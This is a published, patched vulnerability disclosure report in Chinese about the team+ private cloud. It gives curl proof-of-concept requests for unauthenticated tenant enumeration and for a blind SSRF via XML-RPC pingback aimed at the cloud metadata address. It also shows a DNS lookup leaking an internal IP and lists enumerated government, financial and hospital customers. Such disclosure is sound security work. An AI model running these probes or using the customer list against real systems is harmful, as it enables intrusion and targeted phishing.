Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2026-00636
- Vendor: 互動資通股份有限公司
- Title: 互動資通 team+ 私有雲平台 CloudKey 未認證租戶列舉、內部 IP 洩漏與 XML-RPC 盲 SSRF
- Introduction: CloudKey 端點可匿名查詢,17 個有效租戶被列舉,並可串聯 XML-RPC pingback 盲 SSRF 與 DNS 內部 IP 洩漏。
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2026/05/06 23:17:04 : 新提交 (由 罐頭 更新此狀態)
- 2026/05/06 23:21:13 : 新提交 (由 罐頭 更新此狀態)
- 2026/05/06 23:30:52 : 新提交 (由 罐頭 更新此狀態)
- 2026/05/06 23:32:09 : 新提交 (由 罐頭 更新此狀態)
- 2026/05/09 17:55:37 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/27 15:54:19 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/27 15:54:19 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/27 15:54:19 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/02 10:12:01 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/02 10:12:05 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/08/04 20:08:22 : 複測申請中 (由 組織帳號 更新此狀態)
- 2026/08/12 10:32:53 : 確認已修補 (由 罐頭 更新此狀態)
- 2026/08/13 03:00:07 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2026-00636
- 通報者:guan4tou2 (罐頭)
- 風險:高
- 類型:資訊洩漏 (Information Leakage)
參考資料
OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure
CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html
相關網址
https://www.teamplus.tech/xmlrpc.php
https://ttalkod.teamplus.tech/
敘述
漏洞概述
本案包含 3 個可串聯的問題:
- F1 (High):CloudKey 未認證列舉(17 valid / 202 probes)
- F2 (Medium):WordPress XML-RPC
pingback.ping盲 SSRF(port-based filter) - F3 (Low):公開 DNS 暴露 RFC1918 內部 IP
已驗證重現步驟(2026-05-06 re-verified live)
F1 — CloudKey 列舉 oracle(2026-05-06 實測)
curl -sk "https://cloud.teamplus.com.tw/enterprise/PrivateCloudCenter/PrivateCloudService.ashx?ASK=getServerSetting&CloudKey=invalidtest99999"
回應:
{"PrivateCloudData":null,"IsSuccess":false,"Description":"get info error"}
curl -sk "https://cloud.teamplus.com.tw/enterprise/PrivateCloudCenter/PrivateCloudService.ashx?ASK=getServerSetting&CloudKey=every8d"
回應(節錄):
{"PrivateCloudData":{"Title":"team+ Community","TwServerUrl":"https://poc.teamplus.com.tw/Every8d/","ServerList":[{"ServerName":"台灣伺服器","Url":"https://poc.teamplus.com.tw/Every8d/"}]},"IsSuccess":true,"Description":"get info success"}
→ 有效 CloudKey 回傳內部服務 URL(poc.teamplus.com.tw/Every8d/)及伺服器清單,無效 CloudKey 回傳 null — oracle 確認。
F2 — pingback timing SSRF(2026-05-06 實測,31 秒 timeout 確認)
time curl -sk https://www.teamplus.tech/xmlrpc.php \
-H 'Content-Type: text/xml' \
--data-raw '<?xml version="1.0"?>
<methodCall><methodName>pingback.ping</methodName><params>
<param><value><string>http://169.254.169.254:80/</string></value></param>
<param><value><string>https://www.teamplus.tech/</string></value></param>
</params></methodCall>'
回應(31 秒後):
<methodResponse>
<fault>
<value><struct>
<member><name>faultCode</name><value><int>0</int></value></member>
<member><name>faultString</name><value><string></string></value></member>
</struct></value>
</fault>
</methodResponse>
curl ... 0.01s user 0.01s system 0% cpu 31.243 total
→ faultCode:0 / faultString 空字串 + 31 秒延遲,表示伺服器端確實嘗試連線 169.254.169.254:80(IMDS)並等到 timeout,而非立即拒絕。為盲 SSRF 確認。
F3 — DNS 內部 IP 洩漏
dig +short ttalkod.teamplus.tech
# tweb.talkod.im.
# t.talkod.im.
# 192.168.57.171
影響(區分 verified / potential)
Verified
-
匿名列舉 28 個 Tier-1 已驗證企業客戶(CloudKey 逐一確認),涵蓋高敏感產業:
產業 CloudKey 組織 金融 / 監管 fsc金管會 FSC 金融 yuanta元大人壽 金融 tcbbank台中銀行 政府 cpc中油 政府 tra台鐵 政府 krtc高捷 政府 thb公路局 政府 twport港務 政府 taisugar台糖 醫療 vghks高雄榮總 醫療 vghtc臺中榮總 醫療 tzuchi慈濟 半導體 umcUMC 聯電 半導體 auoAUO 友達 半導體 spil矽品 半導體 apacer宇瞻 半導體 compeq華通 半導體 chimei奇美 製造 advantech研華 -
每個有效 CloudKey 的回應含內部服務 URL(
TwServerUrl)及伺服器清單,洩漏內部部署路徑(如https://poc.teamplus.com.tw/Every8d/)。 -
xmlrpc.phppingback 對169.254.169.254:80(IMDS)實測 31 秒 timeout(伺服器端確實嘗試連線)。 -
公開 DNS 洩漏 RFC1918 內部位址
192.168.57.171(ttalkod.teamplus.tech)。
Potential(條件式)
- 攻擊者可對列出的政府/金融/醫療客戶發動定向釣魚,冒充 team+ 內部通知。
- 若
teamplus.tech部署於雲端環境,IMDS SSRF 可升級為雲端 IAM 憑證洩漏。 - 擴大 CloudKey 字典可能列出更多客戶(目前 40+ 總計,28 Tier-1 已確認)。
修補建議
1. getServerSetting 改為需認證或簽名請求(HMAC + timestamp),移除匿名查詢能力。
2. 失敗與成功回應統一格式,消除列舉 oracle。
3. 立即下線測試租戶/內網 URL(例如 test/jmeter)對外暴露。
4. xmlrpc.php 建議停用 pingback.ping;若需保留,改成 IP allowlist + RFC1918/IMDS blocklist,不可只做 port filter。
5. 清理公開 DNS 中指向 RFC1918 的紀錄,採 split-horizon DNS。